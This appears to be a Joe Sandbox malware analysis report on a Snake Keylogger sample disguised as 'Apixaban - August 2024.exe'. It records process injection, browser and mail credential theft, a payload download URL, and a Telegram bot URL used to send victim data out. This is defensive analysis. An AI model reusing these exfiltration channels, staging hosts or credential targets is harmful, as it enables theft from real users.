Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | API call chain: ExitProcess graph end node (graph_0-3502)
Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | API call chain: ExitProcess graph end node (graph_0-3503)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_078357C0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk
Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A60000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 251FF18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

Source: Yara match | File source: 0000000A.00000002.2653419991.00000000251E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 1372, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: Process Memory Space: wab.exe PID: 1372, type: MEMORYSTR

          Remote Access Functionality

Source: Yara match | File source: 0000000A.00000002.2653419991.00000000251E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 1372, type: MEMORYSTR
MITRE ATT&CK Matrix (a number before a technique name is the count of matching signatures; techniques without a number were not observed)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 111 Process Injection | 2 Obfuscated Files or Information | LSASS Memory | 116 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Software Packing | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 211 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 41 Virtualization/Sandbox Evasion | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1481493 | Sample: Apixaban - August 2024.exe | Start date: 25/07/2024 | Architecture: WINDOWS | Score: 100

Contacted hosts: reallyfreegeoip.org; api.telegram.org; 5 other IPs or domains
Sample-level signatures: Found malware configuration; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 7 other signatures
• reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
• api.telegram.org: Uses the Telegram API (likely for C&C communication)

Process tree:
• Apixaban - August 2024.exe (started)
  Dropped: C:\Users\user\AppData\...\Kompottens.Sub, ASCII
  Signatures: Suspicious powershell command line found
  • powershell.exe (started)
    Dropped: C:\Users\user\...\Apixaban - August 2024.exe, PE32; Apixaban - August ...exe:Zone.Identifier, ASCII
    Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
    • wab.exe (started)
      Network: electromac.com.bo 192.185.142.133, ports 49728, 49729, 587, UNIFIEDLAYER-AS-1US, United States; api.telegram.org 149.154.167.220, ports 443, 49727, TELEGRAMRU, United Kingdom; 3 other IPs or domains
      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
    • conhost.exe (started)

Source | Detection | Scanner | Label
Apixaban - August 2024.exe | 53% | ReversingLabs | Win32.Spyware.Snakekeylogger

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren\Apixaban - August 2024.exe | 53% | ReversingLabs | Win32.Spyware.Snakekeylogger
          No Antivirus matches
          No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.reap.skyestates.com.mt | 108.167.181.251 | true | false | | unknown
reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown
electromac.com.bo | 192.185.142.133 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
checkip.dyndns.com | 193.122.6.168 | true | false | | unknown
mail.electromac.com.bo | unknown | unknown | true | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://www.reap.skyestates.com.mt/wp-includes/yPrtLahZfwrl128.bin | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2026/07/2024%20/%2003:56:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
192.185.142.133 | electromac.com.bo | United States | 46606 | UNIFIEDLAYER-AS-1US | true
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
108.167.181.251 | www.reap.skyestates.com.mt | United States | 46606 | UNIFIEDLAYER-AS-1US | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1481493
Start date and time: 2024-07-25 10:03:38 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Apixaban - August 2024.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/11@5/5
                          EGA Information:
                          • Successful, ratio: 66.7%
                          HCA Information:
                          • Successful, ratio: 97%
                          • Number of executed functions: 114
                          • Number of non-executed functions: 72
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target powershell.exe, PID 332 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Apixaban - August 2024.exe
Time | Type | Description
04:04:34 | API Interceptor | 44x Sleep call for process: powershell.exe modified
04:06:03 | API Interceptor | 287x Sleep call for process: wab.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
IPs: other analyses that contacted the same IP (Context: the URL requested on that IP, where the report recorded one). The "Get hash" and "Browse" controls of the original table are links and carry no data here.

Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | Torpernes.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | Lisect_AVT_24003_G1B_119.exe | malicious | Unknown |
149.154.167.220 | Lisect_AVT_24003_G1B_119.exe | malicious | Unknown |
149.154.167.220 | Lisect_AVT_24003_G1B_33.exe | malicious | Unknown |
149.154.167.220 | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Install.msi | malicious | Unknown |
149.154.167.220 | rPO0977-6745.exe | malicious | Snake Keylogger |
149.154.167.220 | z23RevisedInvoice.exe | malicious | DarkCloud, PureLog Stealer |
149.154.167.220 | Updated PI.exe | malicious | AgentTesla, RedLine |
149.154.167.220 | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
193.122.6.168 | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | Confirmation transfer Copy AGS # 24-00379.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | Orden de Compra..exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | Fekdjuvq.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | neworder.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | ORDER INQUIRY_QTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | QvS0a5bvCMM8EUj.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | SecuriteInfo.com.Trojan.AutoIt.1413.12984.723.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | SecuriteInfo.com.Trojan.MSIL.Crypt.25795.12791.exe | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
Domains: other analyses that contacted the same domain (Context: the IP the domain resolved to in that analysis).

Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | Torpernes.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | Confirmation Order.js | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | Deye Union - PO # 23081377.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | rPO0977-6745.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | z1QuotationSheetVSAA6656776.exe | malicious | GuLoader, Snake Keylogger | 172.67.177.134
reallyfreegeoip.org | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe | malicious | Snake Keylogger | 188.114.96.3
checkip.dyndns.com | Torpernes.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
checkip.dyndns.com | Confirmation Order.js | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | Confirmation transfer Note AGS # 22-00379.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
checkip.dyndns.com | Deye Union - PO # 23081377.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | rPO0977-6745.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | z1QuotationSheetVSAA6656776.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
checkip.dyndns.com | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | rRFQ_025261-97382.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
www.reap.skyestates.com.mt | Confirmation transfer AGS # 22-00379.exe | malicious | FormBook, GuLoader | 108.167.181.251
www.reap.skyestates.com.mt | ESPLS-RFQ_2400282.exe | malicious | Azorult, GuLoader | 108.167.181.251
www.reap.skyestates.com.mt | MB9901717-PDF.exe | malicious | Azorult, GuLoader | 108.167.181.251
www.reap.skyestates.com.mt | Confirmation transfer Note AGS # 22-00379.exe | malicious | GuLoader, Snake Keylogger | 108.167.181.251
www.reap.skyestates.com.mt | List & Sample_Doc3.exe | malicious | GuLoader, Snake Keylogger | 108.167.181.251
www.reap.skyestates.com.mt | Apixaban - August 2024.XLS.exe | malicious | Snake Keylogger | 108.167.181.251
www.reap.skyestates.com.mt | odemePlani.pdf.exe | malicious | Azorult, GuLoader | 108.167.181.251
www.reap.skyestates.com.mt | #91139_C050.exe | malicious | Azorult, GuLoader | 108.167.181.251
www.reap.skyestates.com.mt | BSX#24001602.exe | malicious | Azorult, GuLoader | 108.167.181.251
api.telegram.org | Torpernes.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Lisect_AVT_24003_G1B_119.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | Lisect_AVT_24003_G1B_119.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | Lisect_AVT_24003_G1B_33.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Install.msi | malicious | Unknown | 149.154.167.220
api.telegram.org | rPO0977-6745.exe | malicious | Snake Keylogger | 149.154.167.220
api.telegram.org | z23RevisedInvoice.exe | malicious | DarkCloud, PureLog Stealer | 149.154.167.220
api.telegram.org | Updated PI.exe | malicious | AgentTesla, RedLine | 149.154.167.220
api.telegram.org | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
ASNs: other analyses that contacted an IP in the same autonomous system (Context: that IP).

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ORACLE-BMC-31898US | Torpernes.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | Lisect_AVT_24003_G1B_67.exe | malicious | Unknown | 158.101.28.51
ORACLE-BMC-31898US | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | Confirmation transfer Note AGS # 22-00379.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | counter.exe | malicious | Bdaejec | 158.101.87.161
ORACLE-BMC-31898US | rPO0977-6745.exe | malicious | Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | z1QuotationSheetVSAA6656776.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | rRFQ_025261-97382.exe | malicious | Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
TELEGRAMRU | Torpernes.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | Bootstrapper.exe | malicious | Hancitor, Vidar | 149.154.167.99
TELEGRAMRU | LisectAVT_2403002C_60.exe | malicious | PureLog Stealer, Vidar | 149.154.167.99
TELEGRAMRU | LisectAVT_2403002C_67.exe | malicious | PureLog Stealer, Vidar | 149.154.167.99
TELEGRAMRU | LisectAVT_2403002C_81.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | Lisect_AVT_24003_G1B_119.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | CraxsRat VIP.exe | malicious | Unknown | 149.154.167.99
TELEGRAMRU | Lisect_AVT_24003_G1B_119.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | Lisect_AVT_24003_G1B_33.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
UNIFIEDLAYER-AS-1US | Confirmation transfer AGS # 22-00379.exe | malicious | FormBook, GuLoader | 108.167.181.251
UNIFIEDLAYER-AS-1US | ESPLS-RFQ_2400282.exe | malicious | Azorult, GuLoader | 108.167.181.251
UNIFIEDLAYER-AS-1US | MB9901717-PDF.exe | malicious | Azorult, GuLoader | 108.167.181.251
UNIFIEDLAYER-AS-1US | LisectAVT_2403002C_14.exe | malicious | AgentTesla | 162.214.101.129
UNIFIEDLAYER-AS-1US | LisectAVT_2403002C_3.exe | malicious | FormBook | 50.87.186.52
UNIFIEDLAYER-AS-1US | LisectAVT_2403002C_79.dll | malicious | Dridex | 50.116.111.64
UNIFIEDLAYER-AS-1US | LisectAVT_2403002C_89.exe | malicious | FormBook | 70.40.218.187
UNIFIEDLAYER-AS-1US | Lisect_AVT_24003_G1B_125.msi | malicious | Unknown | 162.240.8.41
UNIFIEDLAYER-AS-1US | Confirmation transfer Note AGS # 22-00379.exe | malicious | GuLoader, Snake Keylogger | 108.167.181.251
UNIFIEDLAYER-AS-1US | https://mail.tekdecoracoes.com.br/don/upload/en.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=&.rand=13InboxLight.aspx?n=1774256418&fid=4 | malicious | Unknown | 162.241.63.57
JA3 fingerprints: other analyses whose TLS client hello produced the same JA3 hash (Context: the server IP contacted). A JA3 hash identifies the TLS client stack, not the malware family, which is why the 3b5074b1... group mixes AgentTesla, Quasar, AteraAgent and grabber samples; treat these rows as weak pivots next to the domain and IP tables above.

Match | Associated Sample Name / URL | Detection | Threat Name | Context
